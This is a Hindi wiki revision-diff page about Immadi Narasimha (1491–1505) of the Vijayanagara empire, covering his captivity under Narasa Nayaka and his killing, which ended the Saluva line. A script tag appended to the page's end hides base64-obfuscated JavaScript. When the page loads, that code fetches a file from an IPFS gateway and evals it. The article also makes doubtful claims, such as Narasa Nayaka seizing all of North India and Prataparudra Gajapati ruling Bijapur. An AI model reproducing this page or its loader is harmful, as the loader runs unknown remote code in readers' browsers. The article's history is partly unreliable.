Difference between revisions of "इम्माडि नरसिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
*[[सालुव नरसिंह]] के बाद उसके बड़े पुत्र '''इम्माडि नरसिंह''' (1491-1505 ई.) ने [[विजयनगर साम्राज्य]] की राजगद्दी प्राप्त की।
+
'''इम्माडि नरसिंह''' (1491-1505 ई.) [[विजयनगर साम्राज्य]] के [[सालुव नरसिंह]] का पुत्र था। [[पिता]] की मृत्यु के बाद वह साम्राज्य का उत्तराधिकारी बना था। किंतु उसकी अल्प वयस्कता से लाभ उठाकर सेनानायक [[नरसा नायक]] ने उसे बन्दी बना लिया और साम्राज्य पर स्वयं अधिकार कर लिया।
*चूँकि इम्माडि इस समय अल्पायु था, इसलिए इसके संरक्षक [[नरसा नायक]] ने उचित मौके पर सम्पूर्ण उत्तर [[भारत]] पर अधिकार कर लिया और स्वंय शासक बन गया।
+
 
 +
*इम्माडि नरसिंह के संरक्षक नरसा नायक ने उचित मौके पर सम्पूर्ण [[उत्तर भारत]] पर अधिकार कर लिया और स्वंय शासक बन गया।
 
*इम्माडि नरसिंह को नरसा ने पेनकोंडा के क़िले में क़ैद कर दिया।
 
*इम्माडि नरसिंह को नरसा ने पेनकोंडा के क़िले में क़ैद कर दिया।
 
*अपने 12-13 वर्ष के शासन काल में नरसा नायक ने [[रायचूर कर्नाटक|रायचूर]], [[दोआब]] के अनेक क़िलों पर अधिकार कर लिया।
 
*अपने 12-13 वर्ष के शासन काल में नरसा नायक ने [[रायचूर कर्नाटक|रायचूर]], [[दोआब]] के अनेक क़िलों पर अधिकार कर लिया।
Line 6: Line 7:
 
*उसने बीजापुर के शासक प्रतापरुद्र देव (गजपति) को भी परास्त किया।
 
*उसने बीजापुर के शासक प्रतापरुद्र देव (गजपति) को भी परास्त किया।
 
*नरसा नायक ने [[चोल वंश|चोल]], [[पाण्ड्य साम्राज्य|पाण्ड्य]] एवं [[चेर वंश|चेर]] शासकों को भी [[विजयनगर साम्राज्य]] की अधीनता स्वीकार करने के लिए विवश किया।
 
*नरसा नायक ने [[चोल वंश|चोल]], [[पाण्ड्य साम्राज्य|पाण्ड्य]] एवं [[चेर वंश|चेर]] शासकों को भी [[विजयनगर साम्राज्य]] की अधीनता स्वीकार करने के लिए विवश किया।
*1505 ई. इम्माडि नरसिंह की हत्या नरसा नायक के पुत्र वीर नरसिंह ने कर दी।
+
*1505 ई. इम्माडि नरसिंह की हत्या नरसा नायक के पुत्र [[वीर नरसिंह]] ने कर दी।
 
* इम्माडि नरसिंह की हत्या के साथ ही [[सालुव वंश]] का अन्त हो गया।
 
* इम्माडि नरसिंह की हत्या के साथ ही [[सालुव वंश]] का अन्त हो गया।
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{विजयनगर साम्राज्य}}
 
{{विजयनगर साम्राज्य}}
[[Category:इतिहास कोश]]
+
[[Category:विजयनगर साम्राज्य]][[Category:मध्य काल]][[Category:इतिहास कोश]]
[[Category:विजयनगर साम्राज्य]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 09:34, 31 August 2013

immadi narasianh (1491-1505 ee.) vijayanagar samrajy ke saluv narasianh ka putr tha. pita ki mrityu ke bad vah samrajy ka uttaradhikari bana tha. kiantu usaki alp vayaskata se labh uthakar senanayak narasa nayak ne use bandi bana liya aur samrajy par svayan adhikar kar liya.

  • immadi narasianh ke sanrakshak narasa nayak ne uchit mauke par sampoorn uttar bharat par adhikar kar liya aur svany shasak ban gaya.
  • immadi narasianh ko narasa ne penakoanda ke qile mean qaid kar diya.
  • apane 12-13 varsh ke shasan kal mean narasa nayak ne rayachoor, doab ke anek qiloan par adhikar kar liya.
  • isake atirikt narasa nayak bijapur, bidar, madura, shrirangapattam ke shasakoan ke viruddh kiye gaye abhiyan mean saphal raha.
  • usane bijapur ke shasak prataparudr dev (gajapati) ko bhi parast kiya.
  • narasa nayak ne chol, pandy evan cher shasakoan ko bhi vijayanagar samrajy ki adhinata svikar karane ke lie vivash kiya.
  • 1505 ee. immadi narasianh ki hatya narasa nayak ke putr vir narasianh ne kar di.
  • immadi narasianh ki hatya ke sath hi saluv vansh ka ant ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>